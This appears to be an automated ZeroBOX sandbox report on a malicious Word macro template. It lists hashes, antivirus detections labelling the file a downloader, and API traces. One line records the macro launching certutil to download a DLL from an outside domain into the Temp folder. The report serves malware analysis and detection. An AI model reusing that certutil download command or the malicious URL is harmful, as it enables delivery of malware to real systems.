Summary | ZeroBOX

content.dotm

VBA_macro
Category Machine Started Completed
FILE s1_win7_x6401 Aug. 3, 2021, 10:14 a.m. Aug. 3, 2021, 10:16 a.m.
Size 27.8KB
Type Microsoft Word 2007+
MD5 23a471d956410bc80dc0cabc006252f6
SHA256 15de5dae7a4b941d941f25cdb281c706714758f80878e47c315c5f3d1c8733e8
CRC32 1CB4C9AF
ssdeep 768:qHrfHh/UBZZ8xxh3+J6VH/pPdSEZI3qSNiV2k:er/NUBZaxxR+J6sKSQz
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

Name Response Post-Analysis Lookup
donattelli.com 185.92.244.225
IP Address Status Action
164.124.101.2 Active Moloch
185.92.244.225 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: **** Online ****
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: CertUtil: -URLCache command FAILED: 0x80072efd (WIN32: 12029)
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: CertUtil: 서버에 연결할 수 없습니다.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2416
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x65001000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1332
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72472000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$ontent.dotm
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x000003ec
filepath: C:\Users\test22\AppData\Local\Temp\~$ontent.dotm
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$ontent.dotm
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
com_class Scripting.FileSystemObject May attempt to write one or more files to the harddisk
parent_process winword.exe martian_process certutil.exe -urlcache -split -f https://donattelli.com/test/ssi/1.dll C:\Users\test22\AppData\Local\Temp\rad3B9AC.tmp.dll
Lionic Trojan.MSWord.Caccf.4!c
Elastic malicious (high confidence)
MicroWorld-eScan VB.Heur.EmoooDldr.1.02CACCF2.Gen
McAfee RDN/Generic Downloader.x
Sangfor Malware.Generic-VBS.Save.481bf0ab
Alibaba TrojanDownloader:VBA/MalDoc.ali1000101
Arcabit VB.Heur.EmoooDldr.1.02CACCF2.Gen
Cyren PP97M/Agent.QA.gen!Eldorado
Symantec Trojan.Gen.NPE
ESET-NOD32 VBA/Obfuscated.C
Avast Script:SNH-gen [Trj]
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender VB.Heur.EmoooDldr.1.02CACCF2.Gen
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
Ad-Aware VB.Heur.EmoooDldr.1.02CACCF2.Gen
TACHYON Suspicious/WOX.Obfus.Gen.8
Emsisoft VB.Heur.EmoooDldr.1.02CACCF2.Gen (B)
F-Secure Heuristic.HEUR/Macro.Downloader.AMGY.Gen
TrendMicro HEUR_VBA.O2
McAfee-GW-Edition BehavesLike.Downloader.mc
FireEye VB.Heur.EmoooDldr.1.02CACCF2.Gen
SentinelOne Static AI - Malicious OPENXML
GData VB.Heur.EmoooDldr.1.02CACCF2.Gen
Avira HEUR/Macro.Downloader.AMGY.Gen
Microsoft TrojanDownloader:O97M/Obfuse.SM!MTB
ViRobot DOC.Z.Agent.28453
Cynet Malicious (score: 99)
AhnLab-V3 Downloader/DOC.Agent
MAX malware (ai score=100)
Zoner Probably Heur.W97Obfuscated
Tencent Heur.Macro.Generic.h.2d815c04
Ikarus Trojan.VBA.Obfuscated
Fortinet VBA/Agent.3FB2!tr.dldr
AVG Script:SNH-gen [Trj]
Qihoo-360 virus.office.obfuscated.1